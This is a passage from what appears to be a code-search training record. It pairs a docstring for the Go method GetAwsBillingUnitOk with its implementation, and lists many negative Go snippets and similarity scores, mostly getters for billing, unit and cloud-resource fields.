os.Getenv(`TIMESTAMP_PARAMETER`),\n\t}\n\tif details.Region == \"\" {\n\t\tdetails.Region = `us-east-1`\n\t}\n\tif details.TokenParameter == \"\" {\n\t\tdetails.TokenParameter = \"slack\"\n\t}\n\tif details.TimeParameter == \"\" {\n\t\tdetails.TimeParameter = \"slack-timestamp\"\n\t}\n\treturn details\n}", "func (bill Amount) ToUnitString(unit_name string) string {\n\tunit_name = strings.ToLower(unit_name)\n\tsetunit := -1\n\tif unit_name == \"mei\" {\n\t\tsetunit = 248\n\t}\n\tif unit_name == \"zhu\" {\n\t\tsetunit = 240\n\t}\n\tif unit_name == \"shuo\" {\n\t\tsetunit = 232\n\t}\n\tif unit_name == \"ai\" {\n\t\tsetunit = 224\n\t}\n\tif unit_name == \"miao\" {\n\t\tsetunit = 216\n\t}\n\tif setunit == -1 {\n\t\t// fin string\n\t\treturn bill.ToFinString()\n\t}\n\tbigunit := bill.ToUnitBigFloat(setunit)\n\tmeistr := bigunit.Text('f', 9)\n\tspx := strings.Split(meistr, \".\")\n\tif len(spx) == 2 {\n\t\tif len(spx[1]) == 9 {\n\t\t\tspx[1] = strings.TrimRight(spx[1], spx[1][8:])\n\t\t\tmeistr = strings.Join(spx, \".\")\n\t\t}\n\t}\n\treturn strings.TrimRight(strings.TrimRight(meistr, \"0\"), \".\")\n\n}", "func (s AWSTestSuite) TestGetAWS() {\n\ts.Equal(\"ID\", env.GetAWSAccessKeyID())\n\ts.Equal(\"test.example.com\", env.GetAWSBucket())\n\ts.Equal(\"/backup/database\", env.GetAWSPath())\n\ts.Equal(\"secret\", env.GetAWSSecretAccessKey())\n\ts.Equal(\"us-east-1\", env.GetAWSRegion())\n}", "func (o *SubDescriptionDto) GetUnitTag() string {\n\tif o == nil || IsNil(o.UnitTag) {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.UnitTag\n}", "func (o *Tier) GetBillingPeriodType() string {\n\tif o == nil || o.BillingPeriodType == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.BillingPeriodType\n}", "func (o TopicRuleErrorActionCloudwatchMetricOutput) MetricUnit() pulumi.StringOutput {\n\treturn o.ApplyT(func(v TopicRuleErrorActionCloudwatchMetric) string { return v.MetricUnit }).(pulumi.StringOutput)\n}", "func (r Virtual_Guest) GetBillingItem() (resp datatypes.Billing_Item_Virtual_Guest, err error) {\n\terr = r.Session.DoRequest(\"SoftLayer_Virtual_Guest\", \"getBillingItem\", nil, &r.Options, &resp)\n\treturn\n}", "func (r ApiGetMetricsForBitlinkByCountriesRequest) Unit(unit TimeUnit) ApiGetMetricsForBitlinkByCountriesRequest {\n\tr.unit = &unit\n\treturn r\n}", "func (m *BillMutation) ClearBillingstatus() {\n\tm.cleared_Billingstatus = true\n}", "func (u *RepoSourceUnit) SourceUnit() (SourceUnit, error) {\n\t// TODO(sqs): return all info; actually json-unmarshal u.Data\n\treturn SourceUnit{\n\t\tName: u.Unit,\n\t\tType: u.UnitType,\n\t}, nil\n}", "func (c *defaultGcsClient) BucketUsageInBytes(ctxIn context.Context, project string, bucket string) (totalSize float64, err error) {\n\tctx, span := trace.StartSpan(ctxIn, \"(*defaultGcsClient).BucketUsageInBytes\")\n\tdefer span.End()\n\n\tstartTime := time.Now().UTC().Add(time.Minute * -11) // storage/total_bytes metric is written every 5 minutes\n\tendTime := time.Now().UTC()\n\treq := &monitoringpb.ListTimeSeriesRequest{\n\t\tName: \"projects/\" + project,\n\t\tFilter: fmt.Sprintf(`metric.type=\"storage.googleapis.com/storage/total_bytes\" resource.type=\"gcs_bucket\" resource.label.bucket_name=\"%s\"`, bucket),\n\t\tInterval: &monitoringpb.TimeInterval{\n\t\t\tStartTime: &timestamp.Timestamp{\n\t\t\t\tSeconds: startTime.Unix(),\n\t\t\t},\n\t\t\tEndTime: &timestamp.Timestamp{\n\t\t\t\tSeconds: endTime.Unix(),\n\t\t\t},\n\t\t},\n\t\tView: monitoringpb.ListTimeSeriesRequest_FULL,\n\t}\n\tit := c.metricClient.ListTimeSeries(ctx, req)\n\tstorageClassCounted := make(map[string]bool)\n\tfor {\n\t\tresp, err := it.Next()\n\t\tif err == iterator.Done {\n\t\t\tbreak\n\t\t}\n\t\tif err != nil {\n\t\t\treturn totalSize, errors.Wrap(err, \"ListTimeSeries failed\")\n\t\t}\n\t\tfor key, value := range resp.GetMetric().GetLabels() {\n\t\t\tif key == \"storage_class\" && !storageClassCounted[value] {\n\t\t\t\tfor _, point := range resp.GetPoints() {\n\t\t\t\t\tstorageClassCounted[value] = true\n\t\t\t\t\ttotalSize += point.Value.GetDoubleValue()\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t}\n\treturn totalSize, nil\n}", "func (d *Drug) QueryUnit() *UnitQuery {\n\treturn (&DrugClient{config: d.config}).QueryUnit(d)\n}", "func (o AccountActiveDirectoryOutput) OrganizationalUnit() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v AccountActiveDirectory) *string { return v.OrganizationalUnit }).(pulumi.StringPtrOutput)\n}", "func GetStorageCapacityUnit(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *StorageCapacityUnitState, opts ...pulumi.ResourceOption) (*StorageCapacityUnit, error) {\n\tvar resource StorageCapacityUnit\n\terr := ctx.ReadResource(\"alicloud:ecs/storageCapacityUnit:StorageCapacityUnit\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (o ElastigroupMultipleMetricsMetricOutput) Unit() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v ElastigroupMultipleMetricsMetric) *string { return v.Unit }).(pulumi.StringPtrOutput)\n}", "func (o ClusterNodeGroupSubscriptionConfigPtrOutput) AutoRenewDurationUnit() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *ClusterNodeGroupSubscriptionConfig) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.AutoRenewDurationUnit\n\t}).(pulumi.StringPtrOutput)\n}", "func (m *MarketplacePlanAccount) GetOrganizationBillingEmail() string {\n\tif m == nil || m.OrganizationBillingEmail == nil {\n\t\treturn \"\"\n\t}\n\treturn *m.OrganizationBillingEmail\n}", "func (o *ViewProjectActivePages) HasBilling() bool {\n\tif o != nil && o.Billing != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *EmbeddedUnitModel) GetUnitGroupId() string {\n\tif o == nil || o.UnitGroupId == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.UnitGroupId\n}", "func GetUUIDOrganizationalUnit(subject string) string {\n\torgUnits := GetAllOrganizationalUnits(subject)\n\tfor _, orgUnit := range orgUnits {\n\t\tif _, err := uuid.Parse(orgUnit); err == nil {\n\t\t\treturn orgUnit\n\t\t}\n\t}\n\treturn \"\"\n}", "func (cfg Config) Unit() unit.Unit {\n\treturn cfg.unit\n}", "func (o ClusterSubscriptionConfigOutput) AutoRenewDurationUnit() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v ClusterSubscriptionConfig) *string { return v.AutoRenewDurationUnit }).(pulumi.StringPtrOutput)\n}", "func (j *JournalTailer) GetUnitName() string {\n\treturn j.unitName\n}", "func (m NoSides) HasBookingUnit() bool {\n\treturn m.Has(tag.BookingUnit)\n}", "func (unit HbarUnit) String() string {\n\treturn string(unit)\n}" ]
[ "0.725526", "0.7068037", "0.7028947", "0.49662375", "0.48930317", "0.48750502", "0.4870752", "0.48601797", "0.48181683", "0.4816353", "0.48036554", "0.47831035", "0.477327", "0.47651938", "0.47399577", "0.47384724", "0.469714", "0.46945193", "0.46901307", "0.46820793", "0.4670104", "0.46642816", "0.46151817", "0.460103", "0.46003008", "0.45795998", "0.4572491", "0.45554963", "0.45543545", "0.45531616", "0.45364627", "0.45140964", "0.4507418", "0.45021307", "0.44884226", "0.4486535", "0.44827753", "0.44752717", "0.44614232", "0.4459552", "0.44496602", "0.4444751", "0.44434172", "0.4430213", "0.44081882", "0.44008964", "0.43917933", "0.43870276", "0.43824223", "0.43803746", "0.4369998", "0.43458256", "0.43180922", "0.43113175", "0.43057767", "0.43056202", "0.42951822", "0.4286542", "0.42846742", "0.42541838", "0.42493334", "0.42391858", "0.42324218", "0.42290962", "0.42220563", "0.42158777", "0.42082033", "0.42005008", "0.41812953", "0.4177801", "0.41747844", "0.4170242", "0.4156931", "0.41498187", "0.4146968", "0.41420278", "0.41395167", "0.41387397", "0.41325712", "0.41322625", "0.4131197", "0.4121267", "0.41165608", "0.41164017", "0.41135854", "0.41069007", "0.4105978", "0.41026714", "0.40922713", "0.40890154", "0.40784505", "0.40699598", "0.40654132", "0.40575722", "0.4049137", "0.40428495", "0.40427518", "0.4041411", "0.4031479", "0.402802" ]
0.7786322
0
GetAwsBillingUnitOk returns a tuple with the AwsBillingUnit field value if set, nil otherwise and a boolean to check if the value has been set.
func (o *CloudAwsVirtualMachineAllOf) GetAwsBillingUnitOk() (*CloudAwsBillingUnitRelationship, bool) { if o == nil || o.AwsBillingUnit == nil { return nil, false } return o.AwsBillingUnit, true }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (o *CloudAwsVirtualMachineAllOf) HasAwsBillingUnit() bool {\n\tif o != nil && o.AwsBillingUnit != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *DataExportQuery) GetUnitOk() (*string, bool) {\n\tif o == nil || o.Unit == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Unit, true\n}", "func (o *ReservationModel) GetUnitOk() (*EmbeddedUnitModel, bool) {\n\tif o == nil || o.Unit == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Unit, true\n}", "func (o *CloudAwsVirtualMachineAllOf) GetAwsBillingUnit() CloudAwsBillingUnitRelationship {\n\tif o == nil || o.AwsBillingUnit == nil {\n\t\tvar ret CloudAwsBillingUnitRelationship\n\t\treturn ret\n\t}\n\treturn *o.AwsBillingUnit\n}", "func (o *AdminInfo) GetBusinessUnitOk() (*BusinessUnit, bool) {\n\tif o == nil || o.BusinessUnit == nil {\n\t\treturn nil, false\n\t}\n\treturn o.BusinessUnit, true\n}", "func (o *ViewProjectActivePages) GetBillingOk() (*bool, bool) {\n\tif o == nil || o.Billing == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Billing, true\n}", "func (o *GetRecipeInformation200ResponseExtendedIngredientsInner) GetUnitOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.Unit, true\n}", "func (o *InlineResponse20075Stats) GetBillingOk() (*InlineResponse20075StatsBilling, bool) {\n\tif o == nil || o.Billing == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Billing, true\n}", "func (o *EnvironmentUsageDto) GetSyntheticBillingUsageOk() (*[]SyntheticBillingUsageDto, bool) {\n\tif o == nil || o.SyntheticBillingUsage == nil {\n\t\treturn nil, false\n\t}\n\treturn o.SyntheticBillingUsage, true\n}", "func (o *Ga4ghChemotherapy) GetDoseUnitOk() (string, bool) {\n\tif o == nil || o.DoseUnit == nil {\n\t\tvar ret string\n\t\treturn ret, false\n\t}\n\treturn *o.DoseUnit, true\n}", "func (o *CloudAwsVirtualMachineAllOf) SetAwsBillingUnit(v CloudAwsBillingUnitRelationship) {\n\to.AwsBillingUnit = &v\n}", "func (o *ReservationModel) GetUnitGroupOk() (*EmbeddedUnitGroupModel, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.UnitGroup, true\n}", "func (o *DataExportQuery) GetUnitReferenceOk() (*int32, bool) {\n\tif o == nil || o.UnitReference == nil {\n\t\treturn nil, false\n\t}\n\treturn o.UnitReference, true\n}", "func (o *SubDescriptionDto) GetUnitTagOk() (*string, bool) {\n\tif o == nil || IsNil(o.UnitTag) {\n\t\treturn nil, false\n\t}\n\treturn o.UnitTag, true\n}", "func (o *AssetWorkloadOptimizerGoogleCloudPlatformBillingOptions) GetBillingAccountIdOk() (*string, bool) {\n\tif o == nil || o.BillingAccountId == nil {\n\t\treturn nil, false\n\t}\n\treturn o.BillingAccountId, true\n}", "func (o *TransactionSplit) GetBunqPaymentIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.BunqPaymentId.Get(), o.BunqPaymentId.IsSet()\n}", "func (o *AUMEvoluation) GetBalanceOk() (*float64, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.Balance, true\n}", "func (o *EmbeddedUnitModel) GetUnitGroupIdOk() (*string, bool) {\n\tif o == nil || o.UnitGroupId == nil {\n\t\treturn nil, false\n\t}\n\treturn o.UnitGroupId, true\n}", "func (o *StorageEnclosure) GetComputeRackUnitOk() (*ComputeRackUnitRelationship, bool) {\n\tif o == nil || o.ComputeRackUnit == nil {\n\t\treturn nil, false\n\t}\n\treturn o.ComputeRackUnit, true\n}", "func (o *ReservationModel) HasUnit() bool {\n\tif o != nil && o.Unit != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *CatalogEntry) GetUnitPriceOk() (*float32, bool) {\n\tif o == nil || o.UnitPrice == nil {\n\t\treturn nil, false\n\t}\n\treturn o.UnitPrice, true\n}", "func (o *ReconciliationTarget) GetUsageOk() (*float32, bool) {\n\tif o == nil || o.Usage == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Usage, true\n}", "func (o *StorageSasExpander) GetComputeRackUnitOk() (*ComputeRackUnitRelationship, bool) {\n\tif o == nil || o.ComputeRackUnit == nil {\n\t\treturn nil, false\n\t}\n\treturn o.ComputeRackUnit, true\n}", "func (o *AssetWorkloadOptimizerGoogleCloudPlatformBillingOptions) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *ViewProjectBudget) GetRepeatUnitOk() (*string, bool) {\n\tif o == nil || o.RepeatUnit == nil {\n\t\treturn nil, false\n\t}\n\treturn o.RepeatUnit, true\n}", "func (o *EquipmentFanModule) GetComputeRackUnitOk() (*ComputeRackUnitRelationship, bool) {\n\tif o == nil || o.ComputeRackUnit == nil {\n\t\treturn nil, false\n\t}\n\treturn o.ComputeRackUnit, true\n}", "func (o *Tier) GetBillingPeriodTypeOk() (*string, bool) {\n\tif o == nil || o.BillingPeriodType == nil {\n\t\treturn nil, false\n\t}\n\treturn o.BillingPeriodType, true\n}", "func (o *MemoryArrayAllOf) GetComputeRackUnitOk() (*ComputeRackUnitRelationship, bool) {\n\tif o == nil || o.ComputeRackUnit == nil {\n\t\treturn nil, false\n\t}\n\treturn o.ComputeRackUnit, true\n}", "func (o *EquipmentFanModule) GetSkuOk() (*string, bool) {\n\tif o == nil || o.Sku == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Sku, true\n}", "func (o *InlineResponse20075Stats) HasBilling() bool {\n\tif o != nil && o.Billing != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *EquipmentLocatorLed) GetComputeRackUnitOk() (*ComputeRackUnitRelationship, bool) {\n\tif o == nil || o.ComputeRackUnit == nil {\n\t\treturn nil, false\n\t}\n\treturn o.ComputeRackUnit, true\n}", "func (o *EquipmentBaseSensor) GetUnitsOk() (*string, bool) {\n\tif o == nil || o.Units == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Units, true\n}", "func (o *Transaction) GetMerchantNameOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.MerchantName.Get(), o.MerchantName.IsSet()\n}", "func (o *RackUnitPersonality) GetComputeRackUnitOk() (*ComputeRackUnitRelationship, bool) {\n\tif o == nil || o.ComputeRackUnit == nil {\n\t\treturn nil, false\n\t}\n\treturn o.ComputeRackUnit, true\n}", "func (o *TransferOriginatorDiligence) GetDebitUsageConfigurationOk() (*TransferDebitUsageConfiguration, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.DebitUsageConfiguration.Get(), o.DebitUsageConfiguration.IsSet()\n}", "func (o *DataExportQuery) HasUnit() bool {\n\tif o != nil && o.Unit != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *DataExportQuery) GetUnitsOk() (*int32, bool) {\n\tif o == nil || o.Units == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Units, true\n}", "func (o *EquipmentIoCardBase) GetSkuOk() (*string, bool) {\n\tif o == nil || o.Sku == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Sku, true\n}", "func (o *BlockDeviceMappingVmUpdate) GetBsuOk() (BsuToUpdateVm, bool) {\n\tif o == nil || o.Bsu == nil {\n\t\tvar ret BsuToUpdateVm\n\t\treturn ret, false\n\t}\n\treturn *o.Bsu, true\n}", "func (o *BaseReportTransaction) GetMerchantNameOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.MerchantName.Get(), o.MerchantName.IsSet()\n}", "func (o *X509CertificateSummaryTypeIssuedTo) GetOrganizationalUnitOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.OrganizationalUnit, true\n}", "func (m NoSides) HasBookingUnit() bool {\n\treturn m.Has(tag.BookingUnit)\n}", "func (o *V0037Node) GetBurstbufferNetworkAddressOk() (*string, bool) {\n\tif o == nil || o.BurstbufferNetworkAddress == nil {\n\t\treturn nil, false\n\t}\n\treturn o.BurstbufferNetworkAddress, true\n}", "func (o *InlineResponse20075StatsBilling) GetCompletedOk() (*string, bool) {\n\tif o == nil || o.Completed == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Completed, true\n}", "func (o *PaymentStatusUpdateWebhook) GetTransactionIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.TransactionId.Get(), o.TransactionId.IsSet()\n}", "func (u *Unit) GetUnitStatus(w http.ResponseWriter) error {\n\tconn, err := sd.NewSystemdConnection()\n\tif err != nil {\n\t\tlog.Errorf(\"Failed to get systemd bus connection: %v\", err)\n\t\treturn err\n\t}\n\tdefer conn.Close()\n\n\tunits, err := conn.ListUnitsByNames([]string{u.Unit})\n\tif err != nil {\n\t\tlog.Errorf(\"Failed get unit '%s' status: %v\", u.Unit, err)\n\t\treturn err\n\t}\n\n\tstatus := UnitStatus{\n\t\tStatus: units[0].ActiveState,\n\t\tUnit: u.Unit,\n\t}\n\n\tjson.NewEncoder(w).Encode(status)\n\n\treturn nil\n}", "func (o *EnvironmentUsageDto) GetInternalUseOk() (*bool, bool) {\n\tif o == nil || o.InternalUse == nil {\n\t\treturn nil, false\n\t}\n\treturn o.InternalUse, true\n}", "func (o *TransferOriginatorDiligence) GetCreditUsageConfigurationOk() (*TransferCreditUsageConfiguration, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.CreditUsageConfiguration.Get(), o.CreditUsageConfiguration.IsSet()\n}", "func (o *BackupUnitProperties) GetNameOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\n\treturn o.Name, true\n}", "func (o *CapabilitySiocModuleManufacturingDef) GetSkuOk() (*string, bool) {\n\tif o == nil || o.Sku == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Sku, true\n}", "func (o *TransactionSplit) GetBillNameOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.BillName.Get(), o.BillName.IsSet()\n}", "func (o *SmartstackBackend) GetCheckDurationOk() (*int32, bool) {\n\tif o == nil || o.CheckDuration == nil {\n\t\treturn nil, false\n\t}\n\treturn o.CheckDuration, true\n}", "func (o *Transaction) GetAccountOwnerOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.AccountOwner.Get(), o.AccountOwner.IsSet()\n}", "func (o *TransactionSplit) GetBudgetIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.BudgetId.Get(), o.BudgetId.IsSet()\n}", "func (o *StorageHyperFlexStorageContainer) GetInUseOk() (*bool, bool) {\n\tif o == nil || o.InUse == nil {\n\t\treturn nil, false\n\t}\n\treturn o.InUse, true\n}", "func (m *MarketplacePlan) GetUnitName() string {\n\tif m == nil || m.UnitName == nil {\n\t\treturn \"\"\n\t}\n\treturn *m.UnitName\n}", "func (o *SubDescriptionDto) HasUnitTag() bool {\n\tif o != nil && !IsNil(o.UnitTag) {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *TransactionSplit) GetBudgetNameOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.BudgetName.Get(), o.BudgetName.IsSet()\n}", "func (o *CartaoProduto) GetUsrOk() (*int64, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Usr.Get(), o.Usr.IsSet()\n}", "func (o *CreditBankStatementUploadBankAccountPeriod) GetEndingBalanceOk() (*float32, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.EndingBalance.Get(), o.EndingBalance.IsSet()\n}", "func (o *AutocompleteIngredientSearch200ResponseInner) GetPossibleUnitsOk() ([]string, bool) {\n\tif o == nil || o.PossibleUnits == nil {\n\t\treturn nil, false\n\t}\n\treturn o.PossibleUnits, true\n}", "func (o *EnvironmentUsageDto) HasSyntheticBillingUsage() bool {\n\tif o != nil && o.SyntheticBillingUsage != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *UcsdBackupInfoAllOf) GetIsPurgedOk() (*bool, bool) {\n\tif o == nil || o.IsPurged == nil {\n\t\treturn nil, false\n\t}\n\treturn o.IsPurged, true\n}", "func (o *User) GetUsageLocationOk() (string, bool) {\n\tif o == nil || o.UsageLocation == nil {\n\t\tvar ret string\n\t\treturn ret, false\n\t}\n\treturn *o.UsageLocation, true\n}", "func (o *EnvironmentUsageDto) GetTrialOk() (*bool, bool) {\n\tif o == nil || o.Trial == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Trial, true\n}", "func (o *HyperflexSnapshotStatus) GetUsedSpaceOk() (*int64, bool) {\n\tif o == nil || o.UsedSpace == nil {\n\t\treturn nil, false\n\t}\n\treturn o.UsedSpace, true\n}", "func (o *ReceiptResponse) GetGasBudgetOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.GasBudget, true\n}", "func (o *EmbeddedUnitModel) HasUnitGroupId() bool {\n\tif o != nil && o.UnitGroupId != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *AllocationList) GetBalanceOk() (*float64, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.Balance, true\n}", "func (o *V0037JobProperties) GetBurstBufferOk() (*string, bool) {\n\tif o == nil || o.BurstBuffer == nil {\n\t\treturn nil, false\n\t}\n\treturn o.BurstBuffer, true\n}", "func (o *SubTransactionParams) GetPurposeOk() (*string, bool) {\n\tif o == nil || o.Purpose == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Purpose, true\n}", "func (o *EnvironmentUsageDto) GetEnvironmentUuidOk() (*string, bool) {\n\tif o == nil || o.EnvironmentUuid == nil {\n\t\treturn nil, false\n\t}\n\treturn o.EnvironmentUuid, true\n}", "func (o *GetRecipeInformation200ResponseExtendedIngredientsInner) GetUnit() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.Unit\n}", "func (o *WafDdosSettings) GetBurstThresholdOk() (*string, bool) {\n\tif o == nil || o.BurstThreshold == nil {\n\t\treturn nil, false\n\t}\n\treturn o.BurstThreshold, true\n}", "func (o *StorageBaseCapacity) GetCapacityUtilizationOk() (*float32, bool) {\n\tif o == nil || o.CapacityUtilization == nil {\n\t\treturn nil, false\n\t}\n\treturn o.CapacityUtilization, true\n}", "func (o *CompanyPayoutDestinationResponse) GetBankOk() (*string, bool) {\n\tif o == nil || IsNil(o.Bank) {\n\t\treturn nil, false\n\t}\n\treturn o.Bank, true\n}", "func (o *PaymentInitiationPaymentGetResponse) GetTransactionIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.TransactionId.Get(), o.TransactionId.IsSet()\n}", "func (o *LocalDatabaseProvider) GetUserLockoutDurationMinutesOk() (*int32, bool) {\n\tif o == nil || o.UserLockoutDurationMinutes == nil {\n\t\treturn nil, false\n\t}\n\treturn o.UserLockoutDurationMinutes, true\n}", "func (o *EditBankConnectionParams) GetBankingUserIdOk() (*string, bool) {\n\tif o == nil || o.BankingUserId == nil {\n\t\treturn nil, false\n\t}\n\treturn o.BankingUserId, true\n}", "func (o *InlineResponse20075StatsBilling) GetActiveOk() (*string, bool) {\n\tif o == nil || o.Active == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Active, true\n}", "func (m NoSides) GetBookingUnit() (v enum.BookingUnit, err quickfix.MessageRejectError) {\n\tvar f field.BookingUnitField\n\tif err = m.Get(&f); err == nil {\n\t\tv = f.Value()\n\t}\n\treturn\n}", "func (o *MemoryArrayAllOf) GetUnitsOk() ([]MemoryUnitRelationship, bool) {\n\tif o == nil || o.Units == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Units, true\n}", "func (o *CreditBankStatementUploadBankAccountPeriod) GetStartingBalanceOk() (*float32, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.StartingBalance.Get(), o.StartingBalance.IsSet()\n}", "func (o *HoldingsOverride) GetCurrencyOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.Currency, true\n}", "func (o *BaseReportTransaction) GetAccountOwnerOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.AccountOwner.Get(), o.AccountOwner.IsSet()\n}", "func (o *DataExportQuery) HasUnitReference() bool {\n\tif o != nil && o.UnitReference != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *CreditBankIncomeTransaction) GetTransactionIdOk() (*string, bool) {\n\tif o == nil || o.TransactionId == nil {\n\t\treturn nil, false\n\t}\n\treturn o.TransactionId, true\n}", "func (o *TransactionSplit) GetBillIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.BillId.Get(), o.BillId.IsSet()\n}", "func (o *Commitstatus) GetUuidOk() (*string, bool) {\n\tif o == nil || o.Uuid == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Uuid, true\n}", "func (o *RequestSepaMoneyTransferParams) GetPurposeOk() (*string, bool) {\n\tif o == nil || o.Purpose == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Purpose, true\n}", "func (vec Vector2) IsUnit() bool {\n\treturn vec.Len() == 1\n}", "func (o *ClientConfiguration) GetAvailableBankGroupsOk() (*[]string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.AvailableBankGroups, true\n}", "func (o *AdminInfo) HasBusinessUnit() bool {\n\tif o != nil && o.BusinessUnit != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *ViewTimelogTotals) GetMinutesBilledOk() (*int32, bool) {\n\tif o == nil || o.MinutesBilled == nil {\n\t\treturn nil, false\n\t}\n\treturn o.MinutesBilled, true\n}", "func (o *UserSessionQueryTileConfiguration) GetHasAxisBucketingOk() (*bool, bool) {\n\tif o == nil || o.HasAxisBucketing == nil {\n\t\treturn nil, false\n\t}\n\treturn o.HasAxisBucketing, true\n}", "func (o *ViewProjectActivePages) HasBilling() bool {\n\tif o != nil && o.Billing != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (a Aggregator) UnitHasStatus(us fleet.UnitStatus, statuses ...Status) (bool, error) {\n\tif len(statuses) == 0 {\n\t\treturn false, maskAny(invalidArgumentError)\n\t}\n\n\tfor _, ms := range us.Machine {\n\t\taggregated, err := a.AggregateStatus(us.Current, us.Desired, ms.SystemdActive, ms.SystemdSub)\n\t\tif err != nil {\n\t\t\treturn false, maskAny(err)\n\t\t}\n\n\t\tfor _, status := range statuses {\n\t\t\tif aggregated == status {\n\t\t\t\treturn true, nil\n\t\t\t}\n\t\t}\n\t}\n\n\treturn false, nil\n}", "func (o *Giveaway) GetUsedOk() (bool, bool) {\n\tif o == nil || o.Used == nil {\n\t\tvar ret bool\n\t\treturn ret, false\n\t}\n\treturn *o.Used, true\n}", "func (a *BackoffTimerValue) GetUnitTimerValue() (unitTimerValue uint8) {}", "func (o *GetRecipeInformation200ResponseExtendedIngredientsInner) SetUnit(v string) {\n\to.Unit = v\n}" ]
[ "0.7104922", "0.64157313", "0.6327983", "0.6289558", "0.62768763", "0.6262793", "0.6195215", "0.5979507", "0.5921889", "0.58292925", "0.58207434", "0.57992446", "0.5798347", "0.575605", "0.549987", "0.5464085", "0.5420285", "0.5416889", "0.540678", "0.5394582", "0.5384341", "0.5373202", "0.5328076", "0.53234035", "0.53135514", "0.5308302", "0.5265758", "0.52482516", "0.5226334", "0.52233875", "0.52047443", "0.51981866", "0.5174146", "0.51621735", "0.5153511", "0.51334876", "0.5120399", "0.50870574", "0.5058414", "0.5028175", "0.5021029", "0.5020381", "0.5013603", "0.5002237", "0.49805894", "0.49798638", "0.49718747", "0.4965672", "0.49565256", "0.49522302", "0.49517557", "0.49389783", "0.49353185", "0.4923705", "0.49208444", "0.49052873", "0.49001053", "0.4898053", "0.48942244", "0.4875473", "0.48619604", "0.48529875", "0.48514178", "0.48498037", "0.4845771", "0.48412916", "0.48242968", "0.48240125", "0.48224023", "0.48181757", "0.48096472", "0.47986463", "0.4796708", "0.47956446", "0.47870663", "0.47860318", "0.47798133", "0.4778801", "0.47759303", "0.47755384", "0.47752312", "0.47734687", "0.47609025", "0.47519735", "0.4749669", "0.47261876", "0.4721108", 